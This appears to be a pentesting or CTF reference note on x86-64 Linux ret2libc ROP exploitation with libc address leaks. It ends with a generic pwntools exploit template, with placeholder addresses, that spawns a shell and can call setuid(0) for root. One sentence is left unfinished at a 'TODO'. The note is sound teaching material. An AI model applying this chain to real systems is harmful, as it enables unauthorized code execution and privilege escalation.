# Linux - ELF64 ROP leaks

### Overview

On the x86-64 architecture, the `rip` register is the instruction pointer, the 64-bit equivalent of the `eip` register on 32-bit x86.

### Preliminary checks

**NX and ASLR**

A ROP exploit should only be used under certain circumstances, as easier and more straightforward techniques can often be used to exploit a buffer overflow vulnerability.

A ROP chain is needed whenever the system on which the binary runs enforces `executable-space protection mechanisms`, which mark memory regions such as the stack as non-executable. If the mechanism is active, shellcode written to the stack through the buffer overflow cannot be executed directly. On Linux systems, this protection relies on the `NX` bit (no-execute bit) of the processor.

Another mechanism that hinders the exploitation of buffer overflow vulnerabilities is `address space layout randomization (ASLR)`. To prevent an attacker from reliably jumping to a known address in memory, ASLR randomizes the positions of key areas of the process address space, including the stack, the heap, the libraries and, for position-independent executables, the base of the executable. With `ASLR` enabled, it is thus not possible to jump to a hardcoded address, whether that of shellcode placed on the stack or that of a `libc` function such as `system`.

The technique presented in this note should only be used whenever both `NX` and `ASLR` mechanisms are being used.

The `rabin2` utility can be used to retrieve the protection mechanisms of a binary:

```bash
rabin2 -I <BINARY>
arch     x86
bits     64
canary   false
class    ELF64
endian   little
nx       true
[...]
```
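`rabin2` only reports the protections of the binary itself, whereas `ASLR` is a system-wide kernel setting. As a minimal sketch, assuming a local Linux system that exposes `/proc/sys/kernel/randomize_va_space`, the current setting could be read as follows (the function names are illustrative):

```python
from pathlib import Path

# Kernel sysctl holding the system-wide ASLR mode
ASLR_SYSCTL = Path("/proc/sys/kernel/randomize_va_space")

ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap base, shared libraries and vDSO)",
    2: "full (partial + heap/brk)",
}


def describe_aslr(value: int) -> str:
    """Translate the sysctl value into a human-readable description."""
    return ASLR_MODES.get(value, "unknown")


def read_aslr_setting(path: Path = ASLR_SYSCTL) -> int:
    """Read the integer ASLR mode from the sysctl file."""
    return int(path.read_text().strip())


if __name__ == "__main__":
    # Only attempt the read where the sysctl file exists (Linux)
    if ASLR_SYSCTL.exists():
        print("ASLR:", describe_aslr(read_aslr_setting()))
```

On a remote target, the same value can only be inferred indirectly, for example by observing that leaked addresses change between runs.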

**Printing functions**

The exploitation technique presented in this note is premised on the ability to leak addresses from the `libc`. A function that writes to `stdout` must therefore be present in the binary. The `puts` and `write` functions can, for example, be used to this effect.

The `objdump` Linux utility can be used to disassemble a binary and display the `plt` section, which contains the stubs for the external functions called by the binary.

```bash
objdump -D <BINARY> | grep "puts\|write"
```

At least one of the functions above must be present in order to conduct a ROP exploit based on `libc` address leaks.

### Calculate padding

The first step is to determine the number of bytes needed to overflow the buffer and reach the saved return address, which is loaded into the `rip` instruction pointer register when the function returns.

The `pattern_create.rb` and `pattern_offset.rb` ruby scripts of the `Metasploit` framework can be used to calculate this offset.

If the binary is provided, `gdb` can be used to retrieve the value at the top of the stack, pointed to by the `rsp` register, after the crash. If the binary is only accessible remotely and cannot be debugged, TODO

```bash
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 5000
gdb-peda$ x/g $rsp
0xXXXXXXXXXXXX: <RETURNED_PATTERN>

/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 5000 -q <RETURNED_PATTERN>
[*] Exact match at offset <RIP_OFFSET>
```
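The principle behind these scripts can be sketched in Python. The code below is a simplified re-implementation of a cyclic pattern for illustration, not the Metasploit code itself, and the function names are assumptions. Since x86-64 is little-endian, the quadword displayed by `x/g $rsp` is converted back to bytes before being searched in the pattern.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Build a pattern of unique triples: Aa0Aa1Aa2...Aa9Ab0..."""
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    return bytes(out[:length])


def pattern_offset(stack_value: int, length: int = 5000) -> int:
    """Return the offset of the quadword read at rsp, or -1 if not found."""
    needle = struct.pack("<Q", stack_value)  # back to in-memory byte order
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    pattern = pattern_create(5000)
    # Simulate a crash where the saved return address sits 72 bytes in
    crashed_value = struct.unpack("<Q", pattern[72:80])[0]
    print(pattern_offset(crashed_value))
```

The returned offset is the number of padding bytes to place before the first address of the ROP chain.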

### Leak libc address

Once the padding needed to overwrite `rip` is known, the next step is to leak the address of a `libc` function in the `GOT` table.

**Pass argument to the printing function**

On 64-bit architecture, the `rdi` register is used to pass the first argument to the called function. A gadget popping a value from the stack into the `rdi` register is thus needed to specify what should be printed as an argument to the printing function.

The `r2` utility can, among others, be used to find a `pop rdi` gadget:

```bash
r2 <BINARY>
[0xXXXXXXXX]> /R pop rdi
0x<ADR_POP_RDI>     5f  pop rdi
0xXXXXXXX           c3  ret
```

If the printing function takes more than one argument, gadgets to populate the following registers must be found:

* `%rsi` : 2nd argument ;
* `%rdx` : 3rd argument ;
* `%rcx` : 4th argument ;
* `%r8` : 5th argument ;
* `%r9` : 6th argument.
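The register order above can be turned into a small chain builder. This is a sketch under a strong assumption: a dedicated `pop <reg>; ret` gadget exists for each register used. In practice, gadgets often pop an extra register (for example `pop rsi; pop r15; ret`), in which case a dummy quadword must be added by hand. The function name and the dictionary of gadgets are hypothetical.

```python
import struct

# Order of the integer/pointer argument registers listed above
ARG_REGISTERS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")


def build_call(func_addr: int, args: list, pop_gadgets: dict) -> bytes:
    """Return the chain bytes that load args into registers, then call func_addr.

    pop_gadgets maps a register name to the address of a `pop <reg>; ret` gadget.
    """
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("only the first six arguments are passed in registers")
    chain = b""
    for reg, value in zip(ARG_REGISTERS, args):
        chain += struct.pack("<Q", pop_gadgets[reg])  # gadget address
        chain += struct.pack("<Q", value)             # value popped into reg
    return chain + struct.pack("<Q", func_addr)
```

For a call such as `write(1, <ADR_GOT_PRINTING>, 8)`, gadgets for `rdi`, `rsi` and `rdx` would be required.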

**Printing function PLT and GOT entries**

The entries in the `PLT` and `GOT` tables for the printing function must be retrieved, which can be done by disassembling the `plt` entry of the binary with the `objdump` Linux utility:

```bash
objdump -D <BINARY> | grep <PRINTING_FUNC>
<ADR_PLT_PRINTING>:	ff 25 32 0b 20 00    	jmpq   *0x200b32(%rip)        # <ADR_GOT_PRINTING> <PRINTING_FUNC@GLIBC_2.2.5>
```
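The `GOT` address shown in the comment of the `objdump` output is derived from the `rip`-relative displacement of the `jmpq` instruction: `rip` already points to the next instruction when the jump executes, so the `GOT` slot is located at the instruction address plus the instruction length plus the displacement. A small sketch of this arithmetic, assuming the 6-byte `ff 25` encoding shown above and a hypothetical stub address of `0x4004e0`:

```python
# Length of `jmpq *disp32(%rip)` encoded as ff 25 <disp32>
JMP_RIP_REL_LEN = 6


def got_slot_address(jmp_addr: int, displacement: int,
                     insn_len: int = JMP_RIP_REL_LEN) -> int:
    """Compute the GOT slot referenced by a rip-relative PLT jump."""
    return jmp_addr + insn_len + displacement


# Hypothetical stub address, displacement taken from the output above
print(hex(got_slot_address(0x4004e0, 0x200b32)))  # 0x601018
```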

**Return to main**

To continue the exploitation after printing the `GOT` entry, without restarting the process and thus re-randomizing the address space, execution must return to the beginning of the program, the `main` function. This simply consists in adding the address of the `main` function to the ROP chain after the call to the printing function. This mechanism is called `ret2main`.

The address of the `main` function in the `text` section can be found using the `objdump` Linux utility:

```bash
objdump -D <BINARY> | grep main
<0000000000ADR_MAIN> <main>:
```

**Stage 1 payload**

Once the needed addresses have been retrieved, the following ROP chain can be constructed: `junk + pop_rdi + printing_func_got + printing_func_plt + main_plt`.

The following Python snippet can be used to generate the payload:

```python
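import struct  # only needed for the built-ins variant
from pwn import p64  # only needed for the pwntools variant

junk = b'A' * <PADDING>  # bytes, so that it can be concatenated with the packed addresses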

# Address example: 0x404028

# Python built-ins
pop_rdi = struct.pack('<Q', <ADR_POP_RDI>)
printing_func_plt = struct.pack('<Q', <ADR_PLT_PRINTING>)
printing_func_got = struct.pack('<Q', <ADR_GOT_PRINTING>)
main_plt = struct.pack('<Q', <ADR_MAIN>)

# pwntools
pop_rdi = p64(<ADR_POP_RDI>)
printing_func_plt = p64(<ADR_PLT_PRINTING>)
printing_func_got = p64(<ADR_GOT_PRINTING>)
main_plt = p64(<ADR_MAIN>)

payload = junk + pop_rdi + printing_func_got + printing_func_plt + main_plt
```

**Automated parsing of the leaked address**

The address of the printing function is then leaked and printed on `stdout` by the process. This value must be retrieved and stored in a variable for future use, as it is needed to calculate the randomized `libc` base address.

`pwntools` can be used to automate the process:

```python
# If the binary displays text before leaking the address
p.recvuntil(b'<STUFF>')
# puts stops at the first null byte: drop the trailing newline and pad back to 8 bytes
leaked_printing_func = p.recvline()[:-1].ljust(8, b'\x00')
leaked_printing_func = u64(leaked_printing_func)
```

The process can also be done using only Python built-ins, for example if the binary exploitation is made using a `subprocess`:

```python
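p.stdin.flush()
# read_until is a user-defined helper (not shown) reading p.stdout until the marker
out = read_until(p.stdout, b'<STUFF>')
arr = out.split(b'\n')
# The index of the line holding the leak depends on the output of the binary
leaked_printing_func = arr[2].strip().ljust(8, b'\x00')
leaked_printing_func = struct.unpack('<Q', leaked_printing_func)[0]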
```
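The padding step deserves a short explanation: `puts` prints bytes up to the first null byte and appends a newline, and user-space addresses on x86-64 have their two most significant bytes set to zero, so only 6 bytes are usually received. A minimal sketch of the decoding, assuming the leak was printed by `puts` (the function name and the sample address are hypothetical):

```python
import struct


def parse_puts_leak(line: bytes) -> int:
    """Decode a little-endian address printed by puts into an integer."""
    # Remove only the newline appended by puts, not other whitespace-like bytes
    raw = line[:-1] if line.endswith(b"\n") else line
    if not 0 < len(raw) <= 8:
        raise ValueError("unexpected leak length: %d" % len(raw))
    # Restore the null bytes that puts did not print
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


leak = parse_puts_leak(b"\x90\x69\xa4\xf7\xff\x7f\n")
print(hex(leak))  # 0x7ffff7a46990
```

If the leaked address itself contains a null byte in its lower bytes, the output is truncated and another `GOT` entry should be leaked instead.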

### Commands execution

The leaked printing function address can be used to retrieve the actual address of the `libc` functions, such as `system` in order to call, for example, `/bin/sh`, and achieve code execution through the exploited binary.

**Find libc symbols offsets**

*Retrieve libc symbols offsets with access to the libc*

If the `libc` loaded by the exploited binary is accessible, its symbol offsets can easily be retrieved. Note that the `libc` is usually located in the `lib` folder: `/lib/x86_64-linux-gnu/libc.so.6`.

```bash
readelf -s <LIBC> | grep <PRINTING_FUNC>
422: <00000000000ADR_LIBC_PRINTING_FUNC>   512 FUNC    WEAK   DEFAULT   13 <PRINTING_FUNC>@@GLIBC_2.2.5

readelf -s <LIBC> | grep system
1403: <00000000000ADR_LIBC_SYSTEM>    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5

# /bin/sh, /bin/bash, etc.
strings -a -t x <LIBC> | grep "/bin/sh"
<ADR_LIBC_SH> /bin/sh
```

*Retrieve libc symbols offsets without access to the libc*

If no direct access to the `libc` is possible in the exploitation context, the symbol offsets of the `libc` used by the process can still be retrieved. Indeed, the `libc-database` can be used to identify the loaded `libc` given the leaked addresses of two entries of the `GOT` table. Search queries to the database can be made using `https://libc.blukat.me/`.

A second entry in the `GOT` table must be obtained:

```bash
objdump -D <BINARY> | grep "GLIBC"
<ADR_PLT_FUNC>:	ff 25 22 0b 20 00    	jmpq   *0x200b22(%rip)        # <ADR_GOT_FUNC> <FUNC@GLIBC_2.2.5>
```
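The lookup works because `ASLR` shifts the `libc` by a multiple of the page size (4 KiB), so the 12 least significant bits of a leaked address are identical to those of the symbol offset in the `libc` file. A minimal sketch of this matching logic, where the function names, leaked addresses and candidate offsets are all hypothetical:

```python
PAGE_MASK = 0xFFF  # 4 KiB pages: the low 12 bits survive randomization


def low12(addr: int) -> int:
    """Return the part of an address that ASLR does not change."""
    return addr & PAGE_MASK


def candidate_matches(leaks: dict, offsets: dict) -> bool:
    """Check whether a candidate libc is consistent with the leaked addresses.

    leaks maps symbol names to leaked runtime addresses,
    offsets maps symbol names to their offsets in the candidate libc.
    """
    for name, addr in leaks.items():
        if name not in offsets or low12(addr) != low12(offsets[name]):
            return False
    # Every symbol must also yield the same base address
    bases = {addr - offsets[name] for name, addr in leaks.items()}
    return len(bases) == 1
```

Leaking two symbols rather than one greatly reduces the number of `libc` versions sharing the same low bits.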

**Calculate randomized libc addresses**

Once the symbols offsets of the `libc` being used have been retrieved, the randomized `libc` addresses of the process can be calculated using the leaked printing function address:

```python
leaked_printing_func = 0x[...]

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

# Python built-ins
sys = struct.pack('<Q', libc_base + libc_system)
sh = struct.pack('<Q', libc_base + libc_sh)

# pwntools
sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)
```
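A useful sanity check can be added to this calculation: the `libc` is mapped on a page boundary, so the computed base address should end with three zero hexadecimal digits. If it does not, the leak was likely parsed incorrectly or the wrong `libc` version was selected. A sketch with a hypothetical function name and hypothetical values:

```python
def compute_libc_base(leaked_addr: int, symbol_offset: int) -> int:
    """Return the libc base, refusing results that are not page-aligned."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page-aligned" % base)
    return base


# Hypothetical leak of puts and its offset in the candidate libc
print(hex(compute_libc_base(0x7ffff7a46990, 0x80990)))  # 0x7ffff79c6000
```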

**Specificities of SUID binaries**

When exploiting an `SUID` binary for local privilege escalation, the privileges granted by the `SUID` bit may be dropped. Notably, `system()` runs its command through `/bin/sh`, and common shells such as `bash` drop privileges on startup if the `euid` (effective user identifier of the process) differs from the `uid` (real user identifier). For an `SUID` binary, the `euid` corresponds to the `uid` of the binary owner.

A call to `setuid` can be used before calling `system("/bin/sh")` to change the `uid` of the process to the one of the binary owner, usually `0` in case of privilege escalation to `root`.

```bash
readelf -s <LIBC> | grep setuid
25: <00000000000ADR_LIBC_SETUID>   144 FUNC    WEAK   DEFAULT   13 setuid@@GLIBC_2.2.5
```

**Stage 2 payload**

Once the randomized addresses of `system` and `/bin/sh` in `libc` are obtained, the following ROP chain can be used to achieve code execution:

* without `setuid`: `junk + pop_rdi + sh + sys`
* with `setuid`, for `SUID` binaries: `junk + pop_rdi + 0x<EUID> + setuid + pop_rdi + sh + sys`

```python
leaked_printing_func = 0x[...]

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

# Python built-ins
sys = struct.pack('<Q', libc_base + libc_system)
sh = struct.pack('<Q', libc_base + libc_sh)

# pwntools
sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

# setuid
libc_setuid = <ADR_LIBC_SETUID>
# Python built-ins
setuid = struct.pack('<Q', libc_base + libc_setuid)
# pwntools
setuid = p64(libc_base + libc_setuid)

payload = junk
# setuid
payload += pop_rdi + p64(0x0) + setuid
payload += pop_rdi + sh + sys

# pwntools
p.sendline(payload)
time.sleep(1)
p.interactive()
```
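Before sending the payload, the layout of the chain can be checked by decoding it back into quadwords. The helper below is an illustrative sketch: the name `split_chain` and the addresses used in the example are hypothetical.

```python
import struct


def split_chain(payload: bytes, padding: int) -> list:
    """Decode the ROP chain that follows the padding into 64-bit integers."""
    body = payload[padding:]
    if len(body) % 8:
        raise ValueError("chain length is not a multiple of 8 bytes")
    return [struct.unpack_from("<Q", body, i)[0] for i in range(0, len(body), 8)]


if __name__ == "__main__":
    # Hypothetical chain: pop_rdi, address of "/bin/sh", address of system
    example = b"A" * 40 + struct.pack("<QQQ", 0x4006d3, 0x7ffff7b5be1a, 0x7ffff7a17420)
    for index, value in enumerate(split_chain(example, 40)):
        print("%02d: 0x%016x" % (index, value))
```

Each printed entry should correspond, in order, to one element of the chain described above.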

### pwntools final code template

The following exploit code can be used as a template to exploit a buffer overflow vulnerability using ROP and `libc` address leaks:

```python
import sys
import time

from pwn import *

context(os = 'linux', arch = 'amd64')

BINARY = '<BINARY>'

OFFSET = 0

if (sys.argv[1] == 'local'):
  p = process(BINARY)
  context.log_level = 'DEBUG'

elif (sys.argv[1] == 'remote'):
  HOST = '<HOST>'
  PORT = 0 # <PORT>
  p = remote(HOST, PORT)

elif (sys.argv[1] == 'ssh'):
  HOST = '<HOST>'
  PORT = 0 # <PORT>
  USERNAME = '<USERNAME>'
  PASSWORD = '<PASSWORD>'
  s = ssh(host=HOST, port=PORT, user=USERNAME, password=PASSWORD)
  p = s.process(BINARY)

junk = OFFSET * b'A'

pop_rdi = p64(<ADR_POP_RDI>)
printing_func_plt = p64(<ADR_PLT_PRINTING>)
printing_func_got = p64(<ADR_GOT_PRINTING>)
main_plt = p64(<ADR_MAIN>)

payload = junk + pop_rdi + printing_func_got + printing_func_plt + main_plt

# If needed
# p.recvuntil(<STUFF>)

p.sendline(payload)

# If needed
# p.recvuntil(<STUFF>)

leaked_printing_func = p.recvline()[:-1].ljust(8, b'\x00')
leaked_printing_func = u64(leaked_printing_func)
log.success('PRINTING_FUNC@GLIBC addr: 0x{:x}'.format(leaked_printing_func))

libc_printing_func = <ADR_LIBC_PRINTING_FUNC>
libc_system = <ADR_LIBC_SYSTEM>
libc_sh = <ADR_LIBC_SH>

libc_base = leaked_printing_func - libc_printing_func

sys = p64(libc_base + libc_system)
sh = p64(libc_base + libc_sh)

# If a setuid call is needed
libc_setuid = <ADR_LIBC_SETUID>
setuid = p64(libc_base + libc_setuid)

payload = junk
# If a setuid call is needed - here with an EUID = 0 (root)
payload += pop_rdi + p64(0x0) + setuid
payload += pop_rdi + sh + sys

# If needed
# p.recvuntil(<STUFF>)

p.sendline(payload)
time.sleep(1)
p.interactive()
```
